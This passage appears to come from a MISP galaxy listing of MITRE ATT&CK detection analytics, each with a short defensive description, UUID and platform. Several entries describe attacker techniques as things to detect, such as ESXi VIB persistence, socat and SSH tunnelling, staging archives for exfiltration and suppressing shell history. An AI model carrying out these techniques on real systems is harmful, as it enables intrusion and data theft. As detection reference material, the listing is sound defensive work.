UUID 53491f5a-7062-41f0-a51d-07b52dc8192c which can be used as unique global reference for Analytic 1654 - AN1654 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1654
mitre_platforms ['iOS']

Analytic 1645 - AN1645

The user can view the default SMS handler in system settings.

Internal MISP references

UUID a69604d3-2909-46bf-afd3-39b47ac5e5fd which can be used as unique global reference for Analytic 1645 - AN1645 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1645
mitre_platforms ['Android']

Analytic 1457 - AN1457

Execution of show version, show hardware, or show system commands through CLI via SSH or console.

Internal MISP references

UUID 3ff23082-b5c6-47c0-8d76-a2d6fa88e622 which can be used as unique global reference for Analytic 1457 - AN1457 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1457
mitre_platforms ['Network Devices']

Analytic 1574 - AN1574

Unusual ESXi processes (vmx, hostd) reading datastore files and generating outbound HTTPS traffic toward external cloud storage endpoints. Defender perspective: anomalous datastore activity followed by network transfers to Dropbox, AWS S3, or other storage services.

Internal MISP references

UUID 682f84f1-5571-4d41-b071-53c8f72a88f1 which can be used as unique global reference for Analytic 1574 - AN1574 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1574
mitre_platforms ['ESXi']

Analytic 1475 - AN1475

Malicious VIB installation for persistence via esxcli software vib install using --force or --no-sig-check, enabling custom startup scripts or firewall rules. Behavior chain: (1) unsigned/suspicious VIB installation → (2) startup script or binary placed in persistent boot path → (3) persistence across reboot via /etc/rc.local.d or other boot hook).

Internal MISP references

UUID 9696a221-35b9-4576-ae75-714c902c2889 which can be used as unique global reference for Analytic 1475 - AN1475 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1475
mitre_platforms ['ESXi']

Analytic 1547 - AN1547

Detection of containerized service accounts or compromised kubeconfigs being used for cluster access from unexpected nodes or IPs.

Internal MISP references

UUID dc062a09-572e-41fc-bfff-f654751a6a0f which can be used as unique global reference for Analytic 1547 - AN1547 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1547
mitre_platforms ['Containers']

Analytic 1754 - AN1754

Network carriers may be able to use firewalls, Intrusion Detection Systems (IDS), or Intrusion Prevention Systems (IPS) to detect and/or block SS7 exploitation.(Citation: CSRIC5-WG10-FinalReport) The CSRIC also suggests threat information sharing between telecommunications industry members.

Internal MISP references

UUID 9bc8daed-e8ea-4c70-95bc-dcb2905b33d3 which can be used as unique global reference for Analytic 1754 - AN1754 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1754
mitre_platforms ['iOS']

Analytic 1745 - AN1745

On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.

On iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.

Internal MISP references

UUID b972ebf0-16d1-4bc2-980b-e8cb0947affa which can be used as unique global reference for Analytic 1745 - AN1745 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1745
mitre_platforms ['Android']

Analytic 1485 - AN1485

launchd or user-invoked processes (ssh, socat) encapsulating traffic via SSH tunnels, VPN-style tooling, or DNS-over-HTTPS clients. Defender sees outbound TLS traffic with embedded DNS or RDP payloads.

Internal MISP references

UUID 359ab8ab-f306-4e67-8ff4-f8e1c8ec7db3 which can be used as unique global reference for Analytic 1485 - AN1485 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1485
mitre_platforms ['macOS']

Analytic 1548 - AN1548

Adversary installs or side-loads an IDE extension (VS Code, IntelliJ/JetBrains, Eclipse) or enables IDE tunneling. Chain: (1) IDE binary starts on a non-developer endpoint or server, often with install/force/tunnel flags → (2) extension files/registrations appear under user profile → (3) browser/IDE initiates outbound connections to extension marketplaces, update endpoints, or IDE remote/tunnel services → (4) optional child tools (ssh, node, powershell) execute under the IDE context.

Internal MISP references

UUID 539a4182-ab9e-4abf-a83b-f30cf2dec770 which can be used as unique global reference for Analytic 1548 - AN1548 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1548
mitre_platforms ['Windows']

Analytic 1458 - AN1458

Detects adversarial archiving of files prior to exfiltration by correlating execution of compression/encryption utilities (e.g., makecab.exe, rar.exe, 7z.exe, powershell Compress-Archive) with subsequent creation of large compressed or encrypted files. Identifies abnormal process lineage involving crypt32.dll usage, command-line arguments invoking compression switches, and file write operations to temporary or staging directories.

Internal MISP references

UUID eaeb2a44-eebe-41f3-875a-a34abdc03252 which can be used as unique global reference for Analytic 1458 - AN1458 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1458
mitre_platforms ['Windows']

Analytic 1584 - AN1584

Use of bash scripts or interactive shells to issue sequential ping, arp, or traceroute commands to map remote hosts.

Internal MISP references

UUID f794d2f4-ad8e-4e11-b374-2c35f8ca38e9 which can be used as unique global reference for Analytic 1584 - AN1584 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1584
mitre_platforms ['Linux']

Analytic 1845 - AN1845

The OS may show a notification to the user that the Signal or WhatsApp account has been linked to a new device.

Internal MISP references

UUID 42ce5243-8859-49dc-b221-2674536063ff which can be used as unique global reference for Analytic 1845 - AN1845 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1845
mitre_platforms ['Android']

Analytic 1854 - AN1854

Application vetting services can detect malicious code in applications. System partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.

Internal MISP references

UUID c8eb9196-3134-4954-9331-838556db9aa1 which can be used as unique global reference for Analytic 1854 - AN1854 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1854
mitre_platforms ['iOS']

Analytic 1549 - AN1549

Adversary installs or abuses IDE extensions via CLI or direct write to profile directories and then communicates with marketplaces or remote tunnel services. Chain: auditd execve (code/idea/eclipse) with install/update flags or writes under ~/.vscode/extensions, ~/.config/JetBrains → outbound flows to .visualstudio.com, marketplace.visualstudio.com, .jetbrains.com, githubusercontent.com, or SSH/WebSocket tunnel endpoints → optional ssh/node processes spawned by IDE.

Internal MISP references

UUID 4dff3c9a-4730-46de-af2f-dfa86b249167 which can be used as unique global reference for Analytic 1549 - AN1549 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1549
mitre_platforms ['Linux']

Analytic 1459 - AN1459

Detects adversarial archiving activity through invocation of utilities like tar, gzip, bzip2, or openssl used in non-administrative or unusual contexts. Correlates command execution patterns with file creation of compressed/encrypted outputs in staging directories (e.g., /tmp, /var/tmp).

Internal MISP references

UUID 8018e3a6-ab64-4fe2-9771-ca129091bc17 which can be used as unique global reference for Analytic 1459 - AN1459 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1459
mitre_platforms ['Linux']

Analytic 1954 - AN1954

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 9d36e6e7-9c6c-495c-9431-464fb525c4e8 which can be used as unique global reference for Analytic 1954 - AN1954 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1954
mitre_platforms ['PRE']

Analytic 1495 - AN1495

Monitor registry modifications to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages or ...\OSConfig\Security Packages, especially insertions of new DLL entries. Correlate this with subsequent DLL module loads into lsass.exe. Track unsigned or anomalous DLLs loading into LSASS using image load auditing. LSASS loads unsigned DLL due to AuditLevel=8 registry configuration or System reboot followed by DLL load into lsass.exe

Internal MISP references

UUID b4a380ed-cc16-47cd-8fe1-44ccf4cad097 which can be used as unique global reference for Analytic 1495 - AN1495 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1495
mitre_platforms ['Windows']

Analytic 1594 - AN1594

Detection of suspicious enumeration of cloud storage objects via API calls such as AWS S3 ListObjectsV2, Azure List Blobs, or GCP ListObjects. Correlate access with account role, user context, and prior authentication activity to identify anomalous usage patterns (e.g., unusual account, unexpected regions, or large-scale enumeration in short time windows).

Internal MISP references

UUID be55aa59-62b5-40cd-bab2-dbc4de80da0e which can be used as unique global reference for Analytic 1594 - AN1594 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1594
mitre_platforms ['IaaS']

Analytic 1945 - AN1945

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID fed95f58-2b3a-46c5-a4b1-a3d378d036cb which can be used as unique global reference for Analytic 1945 - AN1945 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1945
mitre_platforms ['PRE']

Analytic 1466 - AN1466

Userland processes invoking syscall-heavy libraries (libc, glibc) followed by fork, mmap, or ptrace behavior commonly associated with code injection or memory manipulation.

Internal MISP references

UUID 552ff82d-467b-4aeb-a4c3-084ca24dbd3e which can be used as unique global reference for Analytic 1466 - AN1466 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1466
mitre_platforms ['Linux']

Analytic 1646 - AN1646

Application vetting services could look for the Android permission android.permission.QUERY_ALL_PACKAGES, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API LSApplicationWorkspace and apply extra scrutiny to applications that employ it.

Internal MISP references

UUID 992c6fa4-689c-4ce1-883f-f48a8b1c5ccc which can be used as unique global reference for Analytic 1646 - AN1646 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1646
mitre_platforms ['Android']

Analytic 1664 - AN1664

Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application. Many properly configured firewalls may naturally block one-way command and control traffic.

Internal MISP references

UUID dec6e0d3-f4ae-48ed-90b9-ee32fd7e8dc6 which can be used as unique global reference for Analytic 1664 - AN1664 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1664
mitre_platforms ['iOS']

Analytic 1467 - AN1467

Execution of processes that link to CoreServices or Foundation APIs followed by creation of memory regions, code execution, or abnormal library injection.

Internal MISP references

UUID 5e02fe2a-7659-4871-b79e-7ea57373aa37 which can be used as unique global reference for Analytic 1467 - AN1467 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1467
mitre_platforms ['macOS']

Analytic 1476 - AN1476

Detects anomalous wireless connections such as unexpected SSID associations, failed or repeated authentication attempts, and connections outside of known geofenced networks. Defenders should monitor wireless connection logs and event codes for network discovery, authentication, and association events.

Internal MISP references

UUID 8586fd06-9801-473e-8ea6-d3da0ec82267 which can be used as unique global reference for Analytic 1476 - AN1476 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1476
mitre_platforms ['Windows']

Analytic 1764 - AN1764

Application vetting services can look for the use of the Android MediaProjectionManager class, applying extra scrutiny to applications that use the class. The user can view a list of apps with accessibility service privileges in the device settings.

Internal MISP references

UUID 427fe5c7-1b91-4d71-ae2c-6840d128f0bd which can be used as unique global reference for Analytic 1764 - AN1764 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1764
mitre_platforms ['Android']

Analytic 1647 - AN1647

Application vetting services could look for the Android permission android.permission.QUERY_ALL_PACKAGES, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API LSApplicationWorkspace and apply extra scrutiny to applications that employ it.

Internal MISP references

UUID bff6f104-006e-48e5-ac3f-4633bb3abac5 which can be used as unique global reference for Analytic 1647 - AN1647 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1647
mitre_platforms ['iOS']

Analytic 1674 - AN1674

Application vetting services could look for applications attempting to get android.os.SystemProperties or getprop with the runtime exec() commands. This could indicate some level of sandbox evasion, as Google recommends against using system properties within applications.

Internal MISP references

UUID dd9778f4-5919-4796-9d4c-b3fb6ace453d which can be used as unique global reference for Analytic 1674 - AN1674 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1674
mitre_platforms ['iOS']

Analytic 1746 - AN1746

On Android, the user can use the device settings menu to view trusted CA certificates and look for unexpected or unknown certificates. A mobile security product could similarly examine the trusted CA certificate store for anomalies. Users can use the device settings menu to view which applications on the device are allowed to install unknown applications.

On iOS, the user can use the device settings menu to view installed Configuration Profiles and look for unexpected or unknown profiles. A Mobile Device Management (MDM) system could use the iOS MDM APIs to examine the list of installed Configuration Profiles for anomalies.

Internal MISP references

UUID f3da45bb-921e-4b4c-8fc3-666c7a37dea6 which can be used as unique global reference for Analytic 1746 - AN1746 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1746
mitre_platforms ['iOS']

Analytic 1468 - AN1468

An SMB-based remote file share access followed by lateral movement actions such as remote service creation, task scheduling, or suspicious process execution on the target host using ADMIN$ or C$ shares.

Internal MISP references

UUID 1a18402e-efb1-49c7-8615-dc907f838320 which can be used as unique global reference for Analytic 1468 - AN1468 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1468
mitre_platforms ['Windows']

Analytic 1486 - AN1486

VMware daemons or user processes encapsulating traffic (e.g., guest VMs tunneling via hostd). Defender sees network services inside ESXi creating flows inconsistent with management plane traffic, such as SSH forwarding or DNS-over-HTTPS from management interfaces.

Internal MISP references

UUID 7f128f2c-5b38-4088-9026-e251237f8add which can be used as unique global reference for Analytic 1486 - AN1486 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1486
mitre_platforms ['ESXi']

Analytic 1648 - AN1648

System information discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 55699534-c11f-4f9b-8908-a0c7d59160fd which can be used as unique global reference for Analytic 1648 - AN1648 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1648
mitre_platforms ['Android']

Analytic 1846 - AN1846

The OS may show a notification to the user that the Signal or WhatsApp account has been linked to a new device.

Internal MISP references

UUID 758e4b0e-3564-4696-8d57-9e3d81198d52 which can be used as unique global reference for Analytic 1846 - AN1846 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1846
mitre_platforms ['iOS']

Analytic 1684 - AN1684

Application vetting services could detect when applications store data insecurely, for example, in unprotected external storage.

Internal MISP references

UUID b755f519-cc0c-44a4-865f-fa9ead44590f which can be used as unique global reference for Analytic 1684 - AN1684 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1684
mitre_platforms ['iOS']

Analytic 1496 - AN1496

Processes not typically associated with encryption loading asymmetric crypto libraries (e.g., rsaenh.dll, crypt32.dll) and subsequently initiating outbound TLS/SSL connections with abnormal certificate chains or handshakes. Defender correlates process creation, module load, and unusual encrypted sessions.

Internal MISP references

UUID 7e1c7338-11d5-4ab4-aefc-bbd81e26068d which can be used as unique global reference for Analytic 1496 - AN1496 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1496
mitre_platforms ['Windows']

Analytic 1946 - AN1946

Monitor for suspicious network traffic that could be indicative of probing for email addresses and/or usernames, such as large/iterative quantities of authentication requests originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.

Internal MISP references

UUID b123fe68-1da5-4c80-b4f0-f3d476891e11 which can be used as unique global reference for Analytic 1946 - AN1946 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1946
mitre_platforms ['PRE']

Analytic 1964 - AN1964

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID b5842814-7d1b-484d-acd8-d1f776c6851f which can be used as unique global reference for Analytic 1964 - AN1964 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1964
mitre_platforms ['PRE']

Analytic 1469 - AN1469

Addition of credentials (keys, app passwords, x.509 certs) to existing cloud accounts, service principals, or OAuth apps via portal or API by non-standard identities or IP ranges.

Internal MISP references

UUID e95d8309-8435-4c32-9ac3-38e350c170c5 which can be used as unique global reference for Analytic 1469 - AN1469 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1469
mitre_platforms ['Identity Provider']

Analytic 1649 - AN1649

System information discovery can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 04e54116-5787-4bb0-9c4a-2b620a80b5dc which can be used as unique global reference for Analytic 1649 - AN1649 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1649
mitre_platforms ['iOS']

Analytic 1694 - AN1694

When vetting applications for potential security weaknesses, the vetting process could look for insecure use of Intents. Developers should be encouraged to use techniques to ensure that the intent can only be sent to an appropriate destination (e.g., use explicit rather than implicit intents, permission checking, checking of the destination app's signing certificate, or utilizing the App Links feature). For mobile applications using OAuth, encourage use of best practice. (Citation: IETF-OAuthNativeApps)(Citation: Android-AppLinks) On Android, users may be presented with a popup to select the appropriate application to open the URI in. If the user sees an application they do not recognize, they can remove it.

Internal MISP references

UUID cbdcf6f3-00c3-4c38-bc7c-ffb6806f0a25 which can be used as unique global reference for Analytic 1694 - AN1694 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1694
mitre_platforms ['iOS']

Analytic 1477 - AN1477

Detects unauthorized wireless associations by monitoring wpa_supplicant logs, NetworkManager events, and system calls related to interface state changes. Anomalies include repeated association failures, new SSIDs outside baselined values, and rogue AP connections.

Internal MISP references

UUID 6ad3d8bb-fc6f-45fb-b44e-871c263230d8 which can be used as unique global reference for Analytic 1477 - AN1477 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1477
mitre_platforms ['Linux']

Analytic 1747 - AN1747

The OS may show a notification to the user that the SIM card has been transferred to another device.

Internal MISP references

UUID 085c9205-d55a-4e33-a5df-241e505be32f which can be used as unique global reference for Analytic 1747 - AN1747 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1747
mitre_platforms ['Android']

Analytic 1774 - AN1774

Application vetting services could look for android.permission.READ_CALENDAR or android.permission.WRITE_CALENDAR in an Android application’s manifest, or NSCalendarsUsageDescription in an iOS application’s Info.plist file. Most applications do not need calendar access, so extra scrutiny could be applied to those that request it. On both Android and iOS, the user can manage which applications have permission to access calendar information through the device settings screen, revoke the permission if necessary.

Internal MISP references

UUID 38e2eb61-e650-4cdc-8f27-213b39499d34 which can be used as unique global reference for Analytic 1774 - AN1774 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1774
mitre_platforms ['Android']

Analytic 1478 - AN1478

Detects unauthorized Wi-Fi associations and SSID scanning activity using unified logs and airport command telemetry. Anomalies include rapid SSID switching, connections to unapproved SSIDs, or repeated authentication failures.

Internal MISP references

UUID 20c2cbdf-2a02-40d1-9d10-b91d9bbe3004 which can be used as unique global reference for Analytic 1478 - AN1478 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1478
mitre_platforms ['macOS']

Analytic 1487 - AN1487

Detects suspicious OAuth application integrations within Office 365 or Google Workspace environments, such as new app registrations, unexpected consent grants, or privilege assignments. Defenders should correlate between application creation/modification events and associated user or service principal activity to identify persistence via app integrations.

Internal MISP references

UUID 6feb9746-7b2c-4f6f-92c9-bfdb14eddddc which can be used as unique global reference for Analytic 1487 - AN1487 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1487
mitre_platforms ['Office Suite']

Analytic 1748 - AN1748

The OS may show a notification to the user that the SIM card has been transferred to another device.

Internal MISP references

UUID 4ce71d01-ba3b-4ed2-a615-766daa0ff144 which can be used as unique global reference for Analytic 1748 - AN1748 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1748
mitre_platforms ['iOS']

Analytic 1847 - AN1847

This is abuse of standard OS-level APIs and are therefore typically undetectable to the end user.

Internal MISP references

UUID 4ec34db8-7214-4059-925e-bdcd58bca391 which can be used as unique global reference for Analytic 1847 - AN1847 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1847
mitre_platforms ['Android']

Analytic 1784 - AN1784

Application vetting services could look for the Android permission android.permission.QUERY_ALL_PACKAGES, and apply extra scrutiny to applications that request it. On iOS, application vetting services could look for usage of the private API LSApplicationWorkspace and apply extra scrutiny to applications that employ it.

Internal MISP references

UUID 87d2ccc4-f82e-493d-9c6f-03303253aec2 which can be used as unique global reference for Analytic 1784 - AN1784 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1784
mitre_platforms ['Android']

Analytic 1497 - AN1497

Processes (e.g., bash, python, custom binaries) dynamically linking libcrypto/libssl for RSA key exchange, then creating external connections with abnormal certificate validation or handshake anomalies. Defender observes syscall traces and outbound asymmetric key exchanges from non-SSL-native processes.

Internal MISP references

UUID 284edcb8-0141-4fe6-afb2-9fd8a2b82b49 which can be used as unique global reference for Analytic 1497 - AN1497 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1497
mitre_platforms ['Linux']

Analytic 1479 - AN1479

Detects rogue or suspicious wireless access attempts by monitoring firewall, WIDS/WIPS, and controller logs. Focus is on firewall rule changes, rogue AP detection, and anomalous MAC addresses connecting to access points.

Internal MISP references

UUID 8ea556b8-d6d3-430c-a438-847b00e607a5 which can be used as unique global reference for Analytic 1479 - AN1479 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1479
mitre_platforms ['Network Devices']

Analytic 1947 - AN1947

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID e46455a1-a3a3-4de9-916d-41ffd2721062 which can be used as unique global reference for Analytic 1947 - AN1947 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1947
mitre_platforms ['PRE']

Analytic 1974 - AN1974

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the potential use of generative artificial intelligence (i.e. Phishing, Phishing for Information).

Internal MISP references

UUID e4b35edc-f7fe-4f0d-aaaf-60fabc9d2698 which can be used as unique global reference for Analytic 1974 - AN1974 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1974
mitre_platforms ['PRE']

Analytic 1749 - AN1749

No standard detection method currently exists for this technique.

Internal MISP references

UUID 7247d454-c307-417a-90c7-a15452d0d83e which can be used as unique global reference for Analytic 1749 - AN1749 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1749
mitre_platforms ['Android']

Analytic 1794 - AN1794

Abuse of standard application protocols can be difficult to detect as many legitimate mobile applications leverage such protocols for language-specific APIs. Enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID 9396ec3f-2189-44d1-9c88-53ee3603236c which can be used as unique global reference for Analytic 1794 - AN1794 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1794
mitre_platforms ['iOS']

Analytic 1488 - AN1488

Detects anomalous SaaS application integration activity across environments such as Slack, Salesforce, or other enterprise SaaS services. Focus is on unauthorized app additions, unusual permission grants, and persistence through service principal tokens.

Internal MISP references

UUID 036a6a5d-bd87-45c7-bd68-43df76167786 which can be used as unique global reference for Analytic 1488 - AN1488 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1488
mitre_platforms ['SaaS']

Analytic 1848 - AN1848

Application vetting services could look for connections to unknown domains or IP addresses. Application vetting services may indicate precisely what content was requested during application execution.

Internal MISP references

UUID 86aa8777-e12a-4dab-81ed-354bed18f3db which can be used as unique global reference for Analytic 1848 - AN1848 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1848
mitre_platforms ['Android']

Analytic 1948 - AN1948

Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 23855fa6-f6d6-4a9c-a270-ea1f2830ef60 which can be used as unique global reference for Analytic 1948 - AN1948 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1948
mitre_platforms ['PRE']

Analytic 1498 - AN1498

Applications or launchd services invoking RSA or public-key routines from the Security framework, followed by outbound SSL/TLS sessions with unrecognized certs or anomalous handshakes. Defender observes unified logs of API calls and suspicious network entropy.

Internal MISP references

UUID 6b63caad-5d8d-4f23-be77-4e81d8904da6 which can be used as unique global reference for Analytic 1498 - AN1498 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1498
mitre_platforms ['macOS']

Analytic 1984 - AN1984

Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in Cobalt Strike payloads.(Citation: Analyzing CS Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.

Internal MISP references

UUID 6f7fa682-fd50-4de4-add3-cbaa3c127b70 which can be used as unique global reference for Analytic 1984 - AN1984 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1984
mitre_platforms ['PRE']

Analytic 1489 - AN1489

Sustained execution of resource-intensive processes (e.g., cryptocurrency miners), often launched via scheduled tasks, WMI, or PowerShell. These processes frequently establish persistent external connections and attempt to evade detection using masqueraded or renamed binaries.

Internal MISP references

UUID 92157361-c2f8-45e6-9624-38a3cdb44598 which can be used as unique global reference for Analytic 1489 - AN1489 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1489
mitre_platforms ['Windows']

Analytic 1849 - AN1849

Application vetting services could look for connections to unknown domains or IP addresses. Application vetting services may indicate precisely what content was requested during application execution.

Internal MISP references

UUID d7e3296a-9f95-4061-b3f5-0f02910745ab which can be used as unique global reference for Analytic 1849 - AN1849 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1849
mitre_platforms ['iOS']

Analytic 1499 - AN1499

VMware services (hostd, vpxa) unexpectedly negotiating asymmetric crypto sessions to external endpoints outside vCenter or update servers. Defender sees encrypted handshakes in logs inconsistent with baseline ESXi communication patterns.

Internal MISP references

UUID 0f9943f2-0e7e-44da-b7dd-e1a7cd52aae0 which can be used as unique global reference for Analytic 1499 - AN1499 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1499
mitre_platforms ['ESXi']

Analytic 1949 - AN1949

Monitoring the content of network traffic can help detect patterns associated with active scanning activities. This can include identifying repeated connection attempts, unusual scanning behaviors, or probing activity targeting multiple IP addresses across a network. Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Internal MISP references

UUID 4ba33f5f-5f75-40c5-96ab-b014e772f9a8 which can be used as unique global reference for Analytic 1949 - AN1949 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1949
mitre_platforms ['PRE']

Analytic 1994 - AN1994

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 4e469a08-db8b-49c1-8bf6-f76ffa21860f which can be used as unique global reference for Analytic 1994 - AN1994 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1994
mitre_platforms ['PRE']

Analytic 1555 - AN1555

Detection of environment variable tampering (HISTFILE, HISTCONTROL, HISTFILESIZE) and absence of expected bash history writes. Correlation of unset or zeroed history variables with active shell sessions is indicative of adversarial evasion.

Internal MISP references

UUID 1f69e126-e849-43a1-9fca-b5c63a154daa which can be used as unique global reference for Analytic 1555 - AN1555 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1555
mitre_platforms ['Linux']

Analytic 1565 - AN1565

Atypical access to Slack or Teams conversations via APIs, automation tokens, or bulk message export functionality, particularly after an account takeover or rare sign-in pattern. Often includes mass retrieval of chat history, download of message content, or scraping of workspace/channel metadata.

Internal MISP references

UUID 222cf26f-e5cc-4b60-a7b2-39118b5c20d6 which can be used as unique global reference for Analytic 1565 - AN1565 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1565
mitre_platforms ['SaaS']

Analytic 1556 - AN1556

Detection of bash/zsh history suppression via HISTFILE/HISTCONTROL manipulation and absence of ~/.bash_history updates. Observing environment variable changes tied to terminal processes is a strong indicator.

Internal MISP references

UUID 2a5f1993-7035-4d94-b9d1-7edb1850d4e1 which can be used as unique global reference for Analytic 1556 - AN1556 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1556
